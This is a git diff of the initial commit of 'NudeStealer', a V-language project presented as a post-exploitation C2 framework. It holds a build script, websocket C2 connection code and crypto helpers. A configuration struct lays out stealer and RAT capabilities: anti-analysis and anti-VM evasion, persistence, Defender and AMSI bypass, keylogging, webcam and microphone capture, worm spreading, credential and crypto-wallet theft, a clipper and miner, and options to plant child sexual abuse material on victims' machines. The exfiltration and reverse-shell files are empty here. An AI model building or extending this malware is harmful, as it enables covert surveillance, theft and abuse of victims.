Initial commit

2026-05-14 00:42:39 +02:00
commit dae8a0a4a1
37 changed files with 1226 additions and 0 deletions
--- a/payload/.editorconfig
+++ b/payload/.editorconfig
@@ -0,0 +1,8 @@
+[*]
+charset = utf-8
+end_of_line = lf
+insert_final_newline = true
+trim_trailing_whitespace = true
+
+[*.v]
+indent_style = tab
--- a/payload/.gitattributes
+++ b/payload/.gitattributes
@@ -0,0 +1,8 @@
+* text=auto eol=lf
+*.bat eol=crlf
+
+*.v linguist-language=V
+*.vv linguist-language=V
+*.vsh linguist-language=V
+v.mod linguist-language=V
+.vdocignore linguist-language=ignore
--- a/payload/.gitignore
+++ b/payload/.gitignore
@@ -0,0 +1,27 @@
+# Binaries for programs and plugins
+main
+NudeStealer
+*.exe
+*.exe~
+*.so
+*.dylib
+*.dll
+
+# Ignore binary output folders
+bin/
+
+# Ignore common editor/system specific metadata
+.DS_Store
+.idea/
+.vscode/
+*.iml
+
+# ENV
+.env
+
+# vweb and database
+*.db
+*.js
+
+# Ignore installed modules through `v install --local`:
+modules/
--- a/payload/build_payload.ps1
+++ b/payload/build_payload.ps1
@@ -0,0 +1,36 @@
+param(
+    [ValidateSet("debug", "release", "size")]
+    [string]$mode = "size",
+
+    [ValidateSet("native", "c", "js_node", "go")]
+    [string]$target = "c",
+
+    [ValidateSet("build", "run")]
+    [string]$action = "build"
+)
+
+if (-not (Test-Path "build")) {
+    New-Item -ItemType Directory -Path "build" | Out-Null
+}
+
+if ($mode -eq "debug") {
+    v -g -cg -b $target -enable-globals -o build/nude_bug .
+}
+elseif ($mode -eq "release") {
+    v -prod -cflags "-O3" -Wfatal-errors -enable-globals -q -skip-unused -b $target -o build/nude_release .
+}
+elseif ($mode -eq "size") {
+    v -prod -cflags "-Os -s" -Wfatal-errors -enable-globals -q -skip-unused -b $target -o build/nude_optimized .
+}
+
+$exe = switch ($mode) {
+    "debug"   { "nude_bug.exe" }
+    "release" { "nude_release.exe" }
+    "size"    { "nude_optimized.exe" }
+}
+
+$v_output = Join-Path -Path "build" -ChildPath $exe
+
+if ($action -eq "run") {
+    & $v_output
+}
--- a/payload/configuration.v
+++ b/payload/configuration.v
@@ -0,0 +1,8 @@
+module main
+
+import structs
+
+pub const configuration = structs.ConfStruct{
+	websocket : 'Müller',
+	fake_error_msg : true,
+}
--- a/payload/core/connect.v
+++ b/payload/core/connect.v
@@ -0,0 +1,11 @@
+module core
+
+import net.websocket
+
+fn connect_ws(url string) ?&websocket.Client {
+    mut ws := websocket.new_client(url) ?
+
+    ws.connect() ?
+
+    return &ws
+}
--- a/payload/core/constants.v
+++ b/payload/core/constants.v
@@ -0,0 +1,11 @@
+module core
+
+__global (
+    logs Logger
+)
+
+pub fn initialize() {
+    logs = Logger{}
+
+    logs.debug('core:constants:initialize', 'test')
+}
--- a/payload/core/logger.v
+++ b/payload/core/logger.v
@@ -0,0 +1,46 @@
+module core
+
+import time
+
+enum LogLevel {
+	info
+	debug
+	error
+}
+
+pub struct Logger {
+mut:
+	logs string
+}
+
+fn log_level_str(level LogLevel) string {
+	return match level {
+		.info { 'INFO' }
+		.debug { 'DEBUG' }
+		.error { 'ERROR' }
+	}
+}
+
+pub fn (mut l Logger) log(mod string, level LogLevel, msg string) {
+	timestamp := time.now().format_ss_milli()
+	full_msg := '[$timestamp] [${log_level_str(level)}] [$mod] $msg'
+
+	println(full_msg)
+
+	l.logs += full_msg + '\n'
+}
+
+pub fn (mut l Logger) info(mod string, msg string) {
+	l.log(mod, .info, msg)
+}
+
+pub fn (mut l Logger) debug(mod string, msg string) {
+	l.log(mod, .debug, msg)
+}
+
+pub fn (mut l Logger) error(mod string, msg string) {
+	l.log(mod, .error, msg)
+}
+pub fn (l Logger) get_logs() string {
+	return l.logs
+}
--- a/payload/cryptography/cryptography.v
+++ b/payload/cryptography/cryptography.v
@@ -0,0 +1,117 @@
+module cryptography
+
+import x.crypto.ascon
+import crypto.rand
+import crypto.hmac
+import x.crypto.curve25519
+import crypto.sha256
+import encoding.base64
+import structs
+
+fn ascon_key_generator() string {
+	key := rand.bytes(ascon.key_size) or {
+        logs.error('cryptography:cryptography:ascon_key_generator', 'ascon key generation failed due to: \'$err\'')
+        return ''
+    }
+	return key.hex()
+}
+
+fn ascon_encrypt(key_hex string, plaintext string) string {
+    key := []u8(key_hex.hex())
+    nonce := rand.bytes(ascon.nonce_size) or {
+        logs.error('cryptography:cryptography:ascon_encrypt', 'nonce generation failed due to: \'$err\'')
+        return ''
+    }
+    ad := []u8{}
+
+    ciphertext := ascon.encrypt(key, nonce, ad, plaintext.bytes()) or {
+        logs.error('cryptography:cryptography:ascon_encrypt', 'encrypt failed: \'$err\'')
+        return ''
+    }
+
+    mut combined := []u8{len: nonce.len + ciphertext.len}
+    combined << nonce
+    combined << ciphertext
+    data_b64 := base64.encode(combined)
+
+    return data_b64
+}
+
+fn ascon_decrypt(key_hex string, data_b64 string) string {
+    key := []u8(key_hex.hex())
+    combined := base64.decode(data_b64)
+
+    if combined.len < ascon.nonce_size {
+        logs.error('cryptography:cryptography:ascon_decrypt', 'data blob is too short')
+        return ''
+    }
+
+    nonce := combined[..ascon.nonce_size]
+    ciphertext := combined[ascon.nonce_size..]
+
+    plaintext_bytes := ascon.decrypt(key, nonce, []u8{}, ciphertext) or {
+        logs.error('cryptography:cryptography:ascon_decrypt', 'decrypt failed: \'$err\'')
+        return ''
+    }
+
+    return plaintext_bytes.bytestr()
+}
+
+fn generate_keypair() !structs.KeyPair {
+    mut secret_key_bytes := curve25519.PrivateKey.new() or {
+        logs.error('cryptography:cryptography:generate_keypair', 'x25519 secret key generation failed due to: \'$err\'')
+        return error('x25519 secret key generation failed due to: \'$err\'')
+    }
+    public_key_bytes := secret_key_bytes.public_key() or {
+        logs.error('cryptography:cryptography:generate_keypair', 'x25519 public key computation/generation failed due to: \'$err\'')
+        return error('x25519 public key computation/generation failed due to: \'$err\'')
+    }
+
+    logs.info('cryptography:cryptography:generate_keypair', 'Generated x25519 keypair')
+    return structs.KeyPair{
+        secret: secret_key_bytes
+        public: public_key_bytes
+    }
+}
+
+fn compute_shared_secret(mut secret_key curve25519.PrivateKey, public_key curve25519.PublicKey) ![]u8 {
+    shared_secret_raw := curve25519.derive_shared_secret(mut secret_key, public_key) or {
+        logs.error('cryptography:cryptography:compute_shared_secret', 'x25519 raw shared_secret computation/derivation failed due to: \'$err\'')
+        return []u8{}
+    }
+
+    logs.info('cryptography:cryptography:compute_shared_secret', 'Computed x25519 raw shared_secret')
+    return shared_secret_raw
+}
+
+fn hkdf_sha256(ikm []u8, salt []u8, length int) []u8 {
+    prk := hmac.new(salt, ikm, sha256.sum, sha256.block_size)
+
+    info := []u8{}
+    mut okm := []u8{}
+    mut previous_block := []u8{}
+    mut counter := u8(1)
+
+    for okm.len < length {
+        mut block_input := previous_block.clone()
+        block_input << info
+        block_input << counter
+
+        block := hmac.new(prk, block_input, sha256.sum, sha256.block_size)
+
+        okm << block
+        previous_block = block.clone()
+        counter++
+    }
+
+    logs.info('cryptography:cryptography:hkdf_sha256', 'Derived HMAC-x25519 shared_secret')
+    return okm[..length]
+}
+
+fn salt_randomizer() []u8 {
+    logs.info('cryptography:cryptography:salt_randomizer', 'Generated CSPRNG randomized salt')
+    return rand.bytes(32) or {
+        logs.error('cryptography:cryptography:salt_randomizer', 'CSPRNG randomized salt generation failed due to: \'$err\'')
+        return []u8{}
+    }
+}
--- a/payload/exfil/discord_stealer.v
+++ b/payload/exfil/discord_stealer.v
--- a/payload/exfil/screenshot.v
+++ b/payload/exfil/screenshot.v
--- a/payload/exfil/system_information_stealer.v
+++ b/payload/exfil/system_information_stealer.v
--- a/payload/main.v
+++ b/payload/main.v
@@ -0,0 +1,27 @@
+module main
+
+import core
+import cryptography
+
+fn main() {
+	core.initialize()
+    logs.info('main:main:main', 'Called initiliazer func!')
+
+	go fn(ch chan WsResult) {
+        conn := core.establish_ws_conn() or {
+            ch <- WsResult{err: 'Could not establish WS: $err'}
+            return
+        }
+        ch <- WsResult{conn: conn}
+    }(ch)
+
+    logs.info('main:main:main', 'Connecting to \'$configuration.websocket\'.')
+
+    res := <-ch
+
+    if res.err != none {
+        logs.error('main:main:main', res.err or { 'Unknown error' })
+    } else {
+        logs.info('main:main:main', 'Successfully connected to WS on \'$configuration.websocket\'.')
+    }
+}
--- a/payload/structs/conf_struct.v
+++ b/payload/structs/conf_struct.v
@@ -0,0 +1,213 @@
+module structs
+
+pub struct ConfStruct {
+	pub mut:
+		websocket string
+		//use_ascon bool
+		//use_x_asymmetric_key_exchange bool
+		allow_remote_control bool // allow c2 live access other than this
+		reconnect_rate string // 'retries per minute/wait period after'
+		start_delay int // in seconds 
+		auto_update bool
+		update_delay int // in minutes
+		updater_keep_old_version bool
+		live_json_config_priority bool // whether to prefer an encrypted json object (randomly dropped on device to store updated configs)
+		// over this hardcoded configuration, this cannot be changed
+		// and is recommended to be set to true except for highly sensitive systems
+
+    	melt_stub bool
+		fake_error_msg bool
+		fake_error_text_msg string
+		anti_kill bool
+		anti_kill_bsod bool
+		anti_vm bool
+		anti_debug bool
+		anti_analysis bool
+		persistence bool
+		persistence_type persistence_type_helper
+
+		webcam_snapshot bool
+		webcam_snapshot_repeat bool
+		webcam_snap_repeat_delay int 
+		microphone_record bool
+		microphone_record_time int // in seconds
+		microphone_recording_repeat bool
+		microphone_recording_repeat_delay int // in minutes, how many minutes to wait until the next recording of x microphone_record_time's length
+
+		disable_cam_indicator_light bool
+
+		screenshot bool
+
+		keylogger bool
+		app_injection bool
+		network_spreading bool
+		usb_spreading bool
+		system_worm bool
+
+		detect_location bool // tries to gain precise geolocation access
+		detect_age_group bool
+		detect_languages_spoken bool
+		detect_gender bool // based on files, system name, location, recent typing activity ect. using BERT ai transformer
+
+		hook_system_password bool
+
+
+		dropper []DropperConfStruct
+
+		exploitation ExploitationConfStruct
+		exfiltration StealerConfStruct
+
+		drainer []WalletConfStruct
+		clipper []WalletConfStruct
+		miner []WalletConfStruct
+
+		plugins SelectiveConfStruct
+		misc FunConfStruct
+}
+
+pub struct StealerConfStruct {
+	pub mut:
+	    network_data bool
+		system_data bool
+		messenger_data bool
+		mail_data bool
+		game_data bool
+		application_data bool
+		workplace_data bool
+		wallet_data bool
+		browser_data bool
+
+		wallet_drainer bool
+		crypto_clipper bool
+		crypto_miner bool
+}
+
+pub struct ExploitationConfStruct {
+	uac_bypass bool
+	disable_reagentc bool
+	destroy_defender bool
+	disable_defender bool
+	disable_etw bool
+	amsi_bypass bool
+}
+
+pub struct WalletConfStruct { // for Drainer, Clipper & Miner Config
+	pub mut:
+		coin crypto_coin_helper
+		wallet_address string
+		miner_usage &int // optional, only used by miner, beneath the same
+		miner_mode &crypto_miner_mode
+}
+
+pub struct SelectiveConfStruct {
+	blacklist_countries []string
+	defender_exclusion_stub bool
+	defender_exclusion_other bool
+	defender_excluded_files []string
+	defender_excluded_folders []string
+	steal_common_files bool
+	delete_common_files bool
+	steal_important_files bool
+	delete_important_files bool
+	important_file_types []string
+	common_file_types []string
+}
+
+pub struct DropperConfStruct {
+	pub mut:
+		file_type dropper_file_type_helper
+		file_link string
+		execute bool
+		save_on_disk bool
+		save_location string
+		startup bool 
+}
+
+pub struct FunConfStruct {
+	pub mut:
+		drop_porn bool
+		drop_child_porn bool
+		drop_rape bool
+		drop_gore bool
+		drop_cats bool
+		drop_unicorns bool
+
+		lock_screen bool
+
+		gmailer bool
+		yahoomailer bool
+		mail_contents string
+
+		random_sounds bool
+
+		random_secret_file_deletion bool
+
+		random_fast_file_deletion bool
+
+		random_secret_app_deletion bool
+
+		disable_task_mngr bool
+		disable_explorer bool
+
+		change_cursor_icon bool
+		cursor_icon_uri string
+
+		swap_wallpaper bool
+		wallpaper_uri string
+
+		invert_screen_colors_random bool
+
+		max_system_volume_random bool
+
+		disable_keyboard bool
+		disable_mouse bool
+		microphone_echo_effect bool
+
+		porn_detection bool // detect porn on the monitor gradually, when detected take webcam snapshot and submit to c2 api
+}
+
+
+// helper structs
+
+pub struct country_helper {
+	pub mut:
+		country string
+}
+
+pub struct file_type_helper {
+	pub mut:
+		file_type string
+}
+
+enum persistence_type_helper {
+    registry
+    taskschd
+    shell_startup
+    shell_common_startup
+}
+
+enum crypto_coin_helper {
+	ltc
+	btc
+	eth
+	xmr
+	sol
+	usdt
+}
+
+enum crypto_miner_mode {
+	cpu
+	gpu
+}
+
+enum dropper_file_type_helper {
+	exe
+	bat
+	ps1
+	zip
+	rar
+	js
+	dll
+	donut_pic_shellcode
+	shortcut
+}
--- a/payload/structs/struct.v
+++ b/payload/structs/struct.v
@@ -0,0 +1,14 @@
+module structs
+
+import x.crypto.curve25519
+
+pub struct KeyPair {
+    pub:
+        secret &curve25519.PrivateKey
+        public  &curve25519.PublicKey
+}
+
+pub struct op_codes {
+    pub:
+        op_code string
+}
--- a/payload/v.mod
+++ b/payload/v.mod
@@ -0,0 +1,7 @@
+Module {
+	name: 'NudeStealer'
+	description: 'NuDeStealer is an R&D post-exploitation C2 cross-platform framework written in a combination of V-lang and python, suitable for any red team operations you might have in mind.'
+	version: '1.0.0'
+	license: '0BSD'
+	dependencies: []
+}
--- a/payload/ws_live/hvnc.v
+++ b/payload/ws_live/hvnc.v
--- a/payload/ws_live/revshell.v
+++ b/payload/ws_live/revshell.v